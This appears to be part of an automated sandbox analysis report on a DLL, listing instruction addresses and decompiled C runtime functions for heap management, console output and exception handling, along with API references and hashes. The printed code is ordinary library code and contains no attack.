                          0x6e24e69e
                          0x6e24e6a1
                          0x6e24e6a2
                          0x6e24e6a4
                          0x6e24e6aa
                          0x6e24e6b1
                          0x6e24e6b4
                          0x6e24e6b7
                          0x6e24e6b8
                          0x6e24e6b9
                          0x6e24e6bc
                          0x6e24e6bd
                          0x6e24e6c0
                          0x6e24e6c6
                          0x6e24e6c8
                          0x6e24e6ed
                          0x6e24e6f7
                          0x6e24e6fd
                          0x6e24e6ff
                          0x6e24e705
                          0x6e24e707
                          0x6e24e95a
                          0x6e24e95b
                          0x00000000
                          0x6e24e70d
                          0x6e24e70d
                          0x6e24e711
                          0x6e24e878
                          0x6e24e88f
                          0x6e24e894
                          0x6e24e897
                          0x6e24e899
                          0x6e24e89f
                          0x6e24e89f
                          0x6e24e8a1
                          0x6e24e8a1
                          0x6e24e8a4
                          0x6e24e8a6
                          0x6e24e8ac
                          0x6e24e8ac
                          0x6e24e8ae
                          0x6e24e935
                          0x6e24e935
                          0x6e24e8b4
                          0x6e24e8b4
                          0x6e24e8b6
                          0x6e24e8bc
                          0x6e24e8bf
                          0x6e24e8c2
                          0x6e24e8c8
                          0x00000000
                          0x00000000
                          0x6e24e8ca
                          0x6e24e8ce
                          0x6e24e8f7
                          0x6e24e8f7
                          0x6e24e8f9
                          0x6e24e8d0
                          0x6e24e8d0
                          0x6e24e8d4
                          0x6e24e8d8
                          0x6e24e8df
                          0x6e24e8e5
                          0x00000000
                          0x6e24e8e7
                          0x6e24e8e7
                          0x6e24e8ea
                          0x6e24e8ed
                          0x6e24e8f5
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24e8f5
                          0x6e24e8e5
                          0x6e24e904
                          0x6e24e904
                          0x6e24e906
                          0x6e24e934
                          0x6e24e934
                          0x00000000
                          0x6e24e908
                          0x6e24e908
                          0x6e24e90e
                          0x6e24e90f
                          0x6e24e910
                          0x6e24e911
                          0x6e24e916
                          0x6e24e91c
                          0x6e24e91f
                          0x6e24e921
                          0x6e24e928
                          0x6e24e92a
                          0x6e24e92c
                          0x6e24e923
                          0x6e24e923
                          0x6e24e924
                          0x00000000
                          0x6e24e924
                          0x6e24e921
                          0x00000000
                          0x6e24e906
                          0x6e24e8fd
                          0x6e24e8ff
                          0x6e24e902
                          0x6e24e902
                          0x00000000
                          0x6e24e902
                          0x6e24e93b
                          0x6e24e93b
                          0x6e24e93c
                          0x6e24e93f
                          0x6e24e945
                          0x6e24e945
                          0x6e24e94e
                          0x6e24e950
                          0x00000000
                          0x6e24e952
                          0x6e24e952
                          0x00000000
                          0x6e24e952
                          0x6e24e950
                          0x00000000
                          0x6e24e717
                          0x6e24e717
                          0x6e24e71c
                          0x00000000
                          0x6e24e722
                          0x6e24e722
                          0x6e24e727
                          0x00000000
                          0x6e24e72d
                          0x6e24e72d
                          0x6e24e733
                          0x6e24e738
                          0x6e24e73a
                          0x6e24e741
                          0x6e24e742
                          0x6e24e744
                          0x00000000
                          0x00000000
                          0x6e24e74a
                          0x6e24e74a
                          0x6e24e74e
                          0x6e24e754
                          0x00000000
                          0x6e24e75a
                          0x6e24e75c
                          0x6e24e75d
                          0x6e24e760
                          0x00000000
                          0x6e24e766
                          0x6e24e766
                          0x6e24e76c
                          0x6e24e771
                          0x6e24e77b
                          0x6e24e77f
                          0x6e24e784
                          0x6e24e787
                          0x6e24e789
                          0x00000000
                          0x6e24e78b
                          0x6e24e78b
                          0x6e24e78d
                          0x6e24e790
                          0x6e24e790
                          0x6e24e793
                          0x6e24e796
                          0x6e24e796
                          0x6e24e7a1
                          0x6e24e7a3
                          0x6e24e7a5
                          0x00000000
                          0x00000000
                          0x6e24e7a5
                          0x00000000
                          0x6e24e7a7
                          0x6e24e7a7
                          0x6e24e7ad
                          0x6e24e7b0
                          0x6e24e7b0
                          0x6e24e7be
                          0x6e24e7c7
                          0x6e24e7cc
                          0x6e24e7d2
                          0x6e24e7d5
                          0x6e24e7d6
                          0x6e24e7d8
                          0x6e24e7e6
                          0x6e24e7e6
                          0x6e24e7ed
                          0x6e24e84e
                          0x00000000
                          0x6e24e7ef
                          0x6e24e7ef
                          0x6e24e7fd
                          0x6e24e802
                          0x6e24e805
                          0x6e24e807
                          0x6e24e977
                          0x6e24e979
                          0x6e24e97a
                          0x6e24e97b
                          0x6e24e97c
                          0x6e24e97d
                          0x6e24e97e
                          0x6e24e983
                          0x6e24e986
                          0x6e24e987
                          0x6e24e98f
                          0x6e24e996
                          0x6e24e999
                          0x6e24e99a
                          0x6e24e99d
                          0x6e24e9a1
                          0x6e24e9a2
                          0x6e24e9a5
                          0x6e24e9b5
                          0x6e24e9d8
                          0x6e24e9dd
                          0x6e24e9e0
                          0x6e24e9e2
                          0x6e24e9f7
                          0x6e24e9fa
                          0x6e24e9fa
                          0x6e24e9fd
                          0x6e24ea03
                          0x6e24ea09
                          0x6e24ea0c
                          0x6e24ea0e
                          0x6e24ea11
                          0x6e24ea18
                          0x6e24ea1b
                          0x6e24ea21
                          0x00000000
                          0x00000000
                          0x6e24ea23
                          0x6e24ea27
                          0x6e24ea50
                          0x6e24ea50
                          0x6e24ea29
                          0x6e24ea29
                          0x6e24ea2d
                          0x6e24ea31
                          0x6e24ea38
                          0x6e24ea3e
                          0x00000000
                          0x6e24ea40
                          0x6e24ea40
                          0x6e24ea43
                          0x6e24ea46
                          0x6e24ea4e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24ea4e
                          0x6e24ea3e
                          0x6e24ea5d
                          0x6e24ea5d
                          0x6e24ea5f
                          0x6e24ea65
                          0x6e24ea6b
                          0x6e24ea6e
                          0x6e24ea6e
                          0x6e24ea71
                          0x6e24ea74
                          0x6e24ea74
                          0x6e24ea84
                          0x6e24ea92
                          0x6e24ea97
                          0x6e24ea9e
                          0x6e24eaa0
                          0x00000000
                          0x6e24eaa6
                          0x6e24eaac
                          0x6e24eab2
                          0x6e24eab9
                          0x6e24eabf
                          0x6e24eac2
                          0x6e24eac8
                          0x6e24ead5
                          0x6e24eadc
                          0x6e24eae1
                          0x6e24eae4
                          0x6e24eae6
                          0x6e24ed3f
                          0x6e24ed45
                          0x6e24ed46
                          0x6e24ed47
                          0x6e24ed48
                          0x6e24ed49
                          0x6e24ed4a
                          0x6e24ed4f
                          0x6e24ed50
                          0x6e24ed5b
                          0x6e24ed63
                          0x6e24ed69
                          0x6e24ed6c
                          0x6e24ed71
                          0x6e24eaec
                          0x6e24eaec
                          0x6e24eafa
                          0x6e24eafd
                          0x6e24eb18
                          0x6e24eb1f
                          0x6e24eb25
                          0x6e24eb2b
                          0x6e24eaff
                          0x6e24eaff
                          0x6e24eb07
                          0x00000000
                          0x6e24eb09
                          0x6e24eb09
                          0x6e24eb0f
                          0x6e24eb0f
                          0x6e24eb07
                          0x6e24eb32
                          0x6e24eb35
                          0x6e24ec52
                          0x6e24ec55
                          0x6e24ec62
                          0x6e24ec65
                          0x6e24ec6d
                          0x6e24ec6d
                          0x6e24ec57
                          0x6e24ec5d
                          0x6e24ec5d
                          0x6e24eb3b
                          0x6e24eb3b
                          0x6e24eb41
                          0x6e24eb49
                          0x6e24eb4b
                          0x6e24eb4e
                          0x6e24eb57
                          0x6e24eb60
                          0x6e24eb66
                          0x6e24eb66
                          0x6e24eb69
                          0x6e24eb6b
                          0x00000000
                          0x00000000
                          0x6e24eb6d
                          0x6e24eb73
                          0x6e24eb74
                          0x6e24eb7f
                          0x6e24eb87
                          0x6e24eb8f
                          0x6e24eb92
                          0x6e24eb95
                          0x6e24eb9b
                          0x6e24eba1
                          0x6e24eba7
                          0x6e24ebad
                          0x6e24ebb0
                          0x00000000
                          0x00000000
                          0x6e24ebb2
                          0x6e24ebd7
                          0x6e24ebd7
                          0x6e24ebda
                          0x6e24ebde
                          0x6e24ebf7
                          0x6e24ebfc
                          0x6e24ebff
                          0x6e24ec01
                          0x6e24ec07
                          0x6e24ec42
                          0x6e24ec09
                          0x6e24ec09
                          0x6e24ec0e
                          0x6e24ec16
                          0x6e24ec17
                          0x6e24ec17
                          0x6e24ec2e
                          0x6e24ec35
                          0x6e24ec38
                          0x6e24ec3d
                          0x6e24ec3d
                          0x6e24ec45
                          0x6e24ec48
                          0x6e24ec48
                          0x6e24ec4d
                          0x00000000
                          0x6e24ec4d
                          0x6e24ebb4
                          0x6e24ebb6
                          0x6e24ebbb
                          0x6e24ebc1
                          0x6e24ebca
                          0x6e24ebd3
                          0x6e24ebd3
                          0x00000000
                          0x6e24ebb6
                          0x6e24ec70
                          0x6e24ec70
                          0x6e24ec74
                          0x6e24ec7c
                          0x6e24ec82
                          0x6e24ec85
                          0x6e24ec8b
                          0x6e24ec8d
                          0x6e24eccd
                          0x6e24ecd3
                          0x6e24ecda
                          0x6e24ecda
                          0x6e24ece0
                          0x6e24ece4
                          0x00000000
                          0x6e24ece6
                          0x6e24ece6
                          0x6e24ecea
                          0x6e24ecef
                          0x6e24ecf3
                          0x6e24ecf8
                          0x6e24ecff
                          0x6e24ed0d
                          0x6e24ed13
                          0x6e24ed16
                          0x6e24ed16
                          0x6e24ece4
                          0x6e24ed25
                          0x6e24ed2d
                          0x6e24ed36
                          0x6e24ec8f
                          0x6e24ec95
                          0x6e24ec98
                          0x6e24ec9f
                          0x6e24ecb1
                          0x6e24ecb8
                          0x6e24ecc5
                          0x00000000
                          0x6e24ecc5
                          0x00000000
                          0x6e24ec8d
                          0x6e24eae6
                          0x6e24ea61
                          0x00000000
                          0x6e24ea61
                          0x00000000
                          0x6e24ea5f
                          0x6e24ea58
                          0x6e24ea5a
                          0x6e24ea5a
                          0x00000000
                          0x6e24e9e4
                          0x6e24e9e4
                          0x6e24e9e4
                          0x6e24e9e6
                          0x6e24e9ea
                          0x6e24e9eb
                          0x6e24e9f6
                          0x6e24e9f6
                          0x6e24e80d
                          0x6e24e80d
                          0x6e24e810
                          0x6e24e815
                          0x6e24e972
                          0x00000000
                          0x6e24e81b
                          0x6e24e81d
                          0x6e24e825
                          0x6e24e82b
                          0x6e24e82c
                          0x6e24e832
                          0x6e24e833
                          0x6e24e838
                          0x6e24e83b
                          0x6e24e83d
                          0x6e24e843
                          0x6e24e845
                          0x6e24e846
                          0x6e24e846
                          0x6e24e854
                          0x6e24e854
                          0x6e24e857
                          0x6e24e859
                          0x6e24e85c
                          0x6e24e86a
                          0x6e24e86a
                          0x6e24e954
                          0x6e24e954
                          0x00000000
                          0x6e24e956
                          0x6e24e956
                          0x00000000
                          0x6e24e85e
                          0x6e24e85e
                          0x6e24e861
                          0x6e24e864
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24e864
                          0x6e24e85c
                          0x6e24e815
                          0x6e24e807
                          0x6e24e7da
                          0x6e24e7dc
                          0x6e24e7dd
                          0x6e24e7e0
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24e7e0
                          0x6e24e7d8
                          0x6e24e760
                          0x00000000
                          0x6e24e754
                          0x00000000
                          0x6e24e871
                          0x6e24e727
                          0x6e24e71c
                          0x6e24e711
                          0x6e24e6ca
                          0x6e24e6ca
                          0x6e24e6cc
                          0x6e24e6ce
                          0x6e24e6cf
                          0x6e24e6d0
                          0x6e24e6d1
                          0x6e24e6d6
                          0x6e24e961
                          0x6e24e965
                          0x6e24e966
                          0x6e24e971
                          0x6e24e971
                          0x6e24e6c8
                          0x00000000

                          APIs
                            • Part of subcall function 6E24F26D: RtlAllocateHeap.NTDLL(00000000,6E2075D9,00000000,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9,00000004,00000000,00000000,00000000), ref: 6E24F29F
                          • _free.LIBCMT ref: 6E24E611
                          • _free.LIBCMT ref: 6E24E628
                          • _free.LIBCMT ref: 6E24E647
                          • _free.LIBCMT ref: 6E24E662
                          • _free.LIBCMT ref: 6E24E679
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$AllocateHeap
                          • String ID: 'n
                          • API String ID: 3033488037-1397255199
                          • Opcode ID: 82d5b5f4c441dc15834a44e6df7a5b7f65ab9c18cd46241f1132c49318378c0f
                          • Instruction ID: 0a893c57c1a0448593334c79b178121568037943c929681ed19f1f765fe0ec54
                          • Opcode Fuzzy Hash: 82d5b5f4c441dc15834a44e6df7a5b7f65ab9c18cd46241f1132c49318378c0f
                          • Instruction Fuzzy Hash: 5951D475A1030DEFEB59CFA9C841AAAB3FAEF45725F100569E809DF250EB35E900CB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E252C2B, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E6E252C2B(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t92;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				signed int _t129;
				signed char* _t131;
				intOrPtr* _t132;
				signed int _t133;
				void* _t134;

				_t78 =  *0x6e2c506c; // 0x8e829fa6
				_v8 = _t78 ^ _t133;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t131 = _a12;
				_v52 = _t131;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x6e2c76f8 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t131;
				_t86 = GetConsoleCP();
				_t132 = _a4;
				_v60 = _t86;
				 *_t132 = 0;
				 *((intOrPtr*)(_t132 + 4)) = 0;
				 *((intOrPtr*)(_t132 + 8)) = 0;
				while(_t131 < _v40) {
					_v28 = 0;
					_v31 =  *_t131;
					_t129 =  *(0x6e2c76f8 + _v48 * 4);
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						_t92 = E6E24367B(_t116, _t129);
						_t129 = 0x8000;
						if(( *(_t92 + ( *_t131 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t131);
							goto L8;
						} else {
							if(_t131 >= _v40) {
								_t129 = _v48;
								 *((char*)( *((intOrPtr*)(0x6e2c76f8 + _t129 * 4)) + _t116 + 0x2e)) =  *_t131;
								 *( *((intOrPtr*)(0x6e2c76f8 + _t129 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x6e2c76f8 + _t129 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
							} else {
								_t112 = E6E24CF1B( &_v28, _t131, 2);
								_t134 = _t134 + 0xc;
								if(_t112 != 0xffffffff) {
									_t131 =  &(_t131[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E6E24CF1B();
						_t134 = _t134 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t131 =  &(_t131[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t132 = GetLastError();
								} else {
									 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 8)) - _v52 + _t131;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t132 + 8)) =  *((intOrPtr*)(_t132 + 8)) + 1;
													 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E6E21F8A5(_v8 ^ _t133, _t129, _t132);
			}



































                          0x6e252c33
                          0x6e252c3a
                          0x6e252c3d
                          0x6e252c45
                          0x6e252c49
                          0x6e252c55
                          0x6e252c58
                          0x6e252c5b
                          0x6e252c62
                          0x6e252c6a
                          0x6e252c6d
                          0x6e252c73
                          0x6e252c79
                          0x6e252c7e
                          0x6e252c80
                          0x6e252c83
                          0x6e252c88
                          0x6e252c92
                          0x6e252c99
                          0x6e252c9c
                          0x6e252ca3
                          0x6e252caa
                          0x6e252cc5
                          0x6e252ccd
                          0x6e252cd6
                          0x6e252cfc
                          0x6e252cfe
                          0x00000000
                          0x6e252cd8
                          0x6e252cdb
                          0x6e252da2
                          0x6e252dae
                          0x6e252db9
                          0x6e252dbe
                          0x6e252ce1
                          0x6e252ce8
                          0x6e252ced
                          0x6e252cf3
                          0x6e252cf9
                          0x00000000
                          0x6e252cf9
                          0x6e252cf3
                          0x6e252cdb
                          0x6e252cac
                          0x6e252cb0
                          0x6e252cb3
                          0x6e252cb9
                          0x6e252cbb
                          0x6e252cbe
                          0x6e252cc2
                          0x6e252cff
                          0x6e252d02
                          0x6e252d03
                          0x6e252d08
                          0x6e252d0e
                          0x6e252d14
                          0x6e252d23
                          0x6e252d29
                          0x6e252d2f
                          0x6e252d34
                          0x6e252d50
                          0x6e252dc3
                          0x6e252dc9
                          0x6e252d52
                          0x6e252d5a
                          0x6e252d63
                          0x6e252d69
                          0x00000000
                          0x6e252d6b
                          0x6e252d6d
                          0x6e252d70
                          0x6e252d89
                          0x00000000
                          0x6e252d8b
                          0x6e252d8f
                          0x6e252d91
                          0x6e252d94
                          0x00000000
                          0x6e252d94
                          0x6e252d8f
                          0x6e252d89
                          0x6e252d69
                          0x6e252d63
                          0x6e252d50
                          0x6e252d34
                          0x6e252d0e
                          0x00000000
                          0x6e252d97
                          0x6e252d97
                          0x6e252dcb
                          0x6e252ddd

                          APIs
                          • GetConsoleCP.KERNEL32(00000000,?,?,?,?,?,?,?,?,6E2533A0,?,?,00000000,?,?,?), ref: 6E252C6D
                          • __fassign.LIBCMT ref: 6E252CE8
                          • __fassign.LIBCMT ref: 6E252D03
                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 6E252D29
                          • WriteFile.KERNEL32(?,00000000,00000000,6E2533A0,00000000,?,?,?,?,?,?,?,?,?,6E2533A0,?), ref: 6E252D48
                          • WriteFile.KERNEL32(?,?,00000001,6E2533A0,00000000,?,?,?,?,?,?,?,?,?,6E2533A0,?), ref: 6E252D81
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                          • String ID:
                          • API String ID: 1324828854-0
                          • Opcode ID: 16dbb80d325d00d4ea424f02295bf5976511163efa669ab6d703e8c571998704
                          • Instruction ID: d6a1b6dbef85d15a2449a7ad8e6a947c604b614d6ee9e06ed70c267ba889a7c5
                          • Opcode Fuzzy Hash: 16dbb80d325d00d4ea424f02295bf5976511163efa669ab6d703e8c571998704
                          • Instruction Fuzzy Hash: A451A4B290064A9FDB00CFA8C985AEEBBFAEF0A300F15455AE955F7381D730D951CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E223F60, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121COMMON
                          Download Yara Rule
                          C-Code - Quality: 52%
                          			E6E223F60(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				long _v40;
				signed int _t48;
				char _t51;
				signed int _t58;
				intOrPtr _t59;
				void* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				void* _t66;
				long _t68;
				long _t70;
				intOrPtr _t74;
				signed int _t78;
				char _t80;
				intOrPtr _t83;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t93;
				long _t95;
				long _t97;
				void* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t105;
				void* _t112;

				_t86 = __edx;
				_push(__ebx);
				_t74 = _a8;
				_push(__edi);
				_v5 = 0;
				_t93 = _t74 + 0x10;
				_t48 =  *(_t74 + 8) ^  *0x6e2c506c;
				_push(_t93);
				_push(_t48);
				_v16 = 1;
				_v20 = _t93;
				_v12 = _t48;
				E6E223F20(_t74, __edx);
				E6E225267(_a12);
				_t51 = _a4;
				_t105 = _t104 + 0xc;
				_t90 =  *((intOrPtr*)(_t74 + 0xc));
				if(( *(_t51 + 4) & 0x00000066) != 0) {
					__eflags = _t90 - 0xfffffffe;
					if(_t90 != 0xfffffffe) {
						_t86 = 0xfffffffe;
						E6E225920(_t74, 0xfffffffe, _t93, 0x6e2c506c);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t51;
					_v28 = _a12;
					 *((intOrPtr*)(_t74 - 4)) =  &_v32;
					if(_t90 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t78 = _v12;
							_t20 = _t90 + 2; // 0x3
							_t58 = _t90 + _t20 * 2;
							_t74 =  *((intOrPtr*)(_t78 + _t58 * 4));
							_t59 = _t78 + _t58 * 4;
							_t79 =  *((intOrPtr*)(_t59 + 4));
							_v24 = _t59;
							if( *((intOrPtr*)(_t59 + 4)) == 0) {
								_t80 = _v5;
								goto L8;
							} else {
								_t86 = _t93;
								_t60 = E6E2258D0(_t79, _t93);
								_t80 = 1;
								_v5 = 1;
								_t112 = _t60;
								if(_t112 < 0) {
									_v16 = 0;
									L14:
									_push(_t93);
									_push(_v12);
									E6E223F20(_t74, _t86);
									goto L15;
								} else {
									if(_t112 > 0) {
										_t61 = _a4;
										__eflags =  *_t61 - 0xe06d7363;
										if( *_t61 == 0xe06d7363) {
											__eflags =  *0x6e26e698;
											if(__eflags != 0) {
												_t70 = E6E267400(__eflags, 0x6e26e698);
												_t105 = _t105 + 4;
												__eflags = _t70;
												if(_t70 != 0) {
													_t97 =  *0x6e26e698; // 0x6e223b1a
													 *0x6e26a26c(_a4, 1);
													 *_t97();
													_t93 = _v20;
													_t105 = _t105 + 8;
												}
												_t61 = _a4;
											}
										}
										_t87 = _t61;
										E6E225904(_t61, _a8, _t61);
										_t63 = _a8;
										__eflags =  *((intOrPtr*)(_t63 + 0xc)) - _t90;
										if( *((intOrPtr*)(_t63 + 0xc)) != _t90) {
											_t87 = _t90;
											E6E225920(_t63, _t90, _t93, 0x6e2c506c);
											_t63 = _a8;
										}
										_push(_t93);
										_push(_v16);
										 *((intOrPtr*)(_t63 + 0xc)) = _t74;
										E6E223F20(_t74, _t87);
										_t88 = _t93;
										_t83 =  *((intOrPtr*)(_v28 + 8));
										E6E2258E8();
										asm("int3");
										_t100 = _t98;
										_t102 = _t100;
										_push(_t102);
										_push(_t93);
										_t95 = _v40;
										__eflags = _t95 - 0xffffffe0;
										if(_t95 > 0xffffffe0) {
											L32:
											 *((intOrPtr*)(E6E242281())) = 0xc;
											_t66 = 0;
											__eflags = 0;
										} else {
											__eflags = _t95;
											if(_t95 == 0) {
												_t95 = _t95 + 1;
											}
											while(1) {
												_t66 = RtlAllocateHeap( *0x6e2c7b04, 0, _t95); // executed
												__eflags = _t66;
												if(_t66 != 0) {
													break;
												}
												__eflags = E6E25BEB2();
												if(__eflags == 0) {
													goto L32;
												} else {
													_t68 = E6E249256(_t74, _t83, _t88, _t90, __eflags, _t95);
													_pop(_t83);
													__eflags = _t68;
													if(_t68 == 0) {
														goto L32;
													} else {
														continue;
													}
												}
												goto L33;
											}
										}
										L33:
										return _t66;
									} else {
										goto L8;
									}
								}
							}
							goto L34;
							L8:
							_t90 = _t74;
						} while (_t74 != 0xfffffffe);
						if(_t80 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L34:
			}




































                          0x6e223f60
                          0x6e223f66
                          0x6e223f67
                          0x6e223f6b
                          0x6e223f6c
                          0x6e223f73
                          0x6e223f76
                          0x6e223f7c
                          0x6e223f7d
                          0x6e223f7e
                          0x6e223f85
                          0x6e223f88
                          0x6e223f8b
                          0x6e223f93
                          0x6e223f98
                          0x6e223f9b
                          0x6e223f9e
                          0x6e223fa5
                          0x6e224006
                          0x6e224009
                          0x6e224011
                          0x6e224018
                          0x00000000
                          0x6e224018
                          0x00000000
                          0x6e223fa7
                          0x6e223fa7
                          0x6e223fad
                          0x6e223fb3
                          0x6e223fb9
                          0x6e224029
                          0x6e224032
                          0x6e223fbb
                          0x6e223fc0
                          0x6e223fc0
                          0x6e223fc3
                          0x6e223fc6
                          0x6e223fc9
                          0x6e223fcc
                          0x6e223fcf
                          0x6e223fd2
                          0x6e223fd7
                          0x6e223fed
                          0x00000000
                          0x6e223fd9
                          0x6e223fd9
                          0x6e223fdb
                          0x6e223fe0
                          0x6e223fe2
                          0x6e223fe5
                          0x6e223fe7
                          0x6e223ffd
                          0x6e22401d
                          0x6e22401d
                          0x6e22401e
                          0x6e224021
                          0x00000000
                          0x6e223fe9
                          0x6e223fe9
                          0x6e224033
                          0x6e224036
                          0x6e22403c
                          0x6e22403e
                          0x6e224045
                          0x6e22404c
                          0x6e224051
                          0x6e224054
                          0x6e224056
                          0x6e224058
                          0x6e224065
                          0x6e22406b
                          0x6e22406d
                          0x6e224070
                          0x6e224070
                          0x6e224073
                          0x6e224073
                          0x6e224045
                          0x6e224079
                          0x6e22407b
                          0x6e224080
                          0x6e224083
                          0x6e224086
                          0x6e22408e
                          0x6e224092
                          0x6e224097
                          0x6e224097
                          0x6e22409a
                          0x6e22409b
                          0x6e22409e
                          0x6e2240a1
                          0x6e2240ac
                          0x6e2240ae
                          0x6e2240b1
                          0x6e2240b6
                          0x6e2240ba
                          0x6e2423d7
                          0x6e24f26f
                          0x6e24f272
                          0x6e24f273
                          0x6e24f276
                          0x6e24f279
                          0x6e24f2ab
                          0x6e24f2b0
                          0x6e24f2b6
                          0x6e24f2b6
                          0x6e24f27b
                          0x6e24f27b
                          0x6e24f27d
                          0x6e24f27f
                          0x6e24f27f
                          0x6e24f296
                          0x6e24f29f
                          0x6e24f2a5
                          0x6e24f2a7
                          0x00000000
                          0x00000000
                          0x6e24f287
                          0x6e24f289
                          0x00000000
                          0x6e24f28b
                          0x6e24f28c
                          0x6e24f291
                          0x6e24f292
                          0x6e24f294
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24f294
                          0x00000000
                          0x6e24f289
                          0x6e24f2a9
                          0x6e24f2b8
                          0x6e24f2ba
                          0x6e223feb
                          0x00000000
                          0x6e223feb
                          0x6e223fe9
                          0x6e223fe7
                          0x00000000
                          0x6e223ff0
                          0x6e223ff0
                          0x6e223ff2
                          0x6e223ff9
                          0x00000000
                          0x6e223ffb
                          0x00000000
                          0x6e223ff9
                          0x6e223fb9
                          0x00000000

                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 6E223F8B
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6E223F93
                          • _ValidateLocalCookies.LIBCMT ref: 6E224021
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6E22404C
                          • _ValidateLocalCookies.LIBCMT ref: 6E2240A1
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
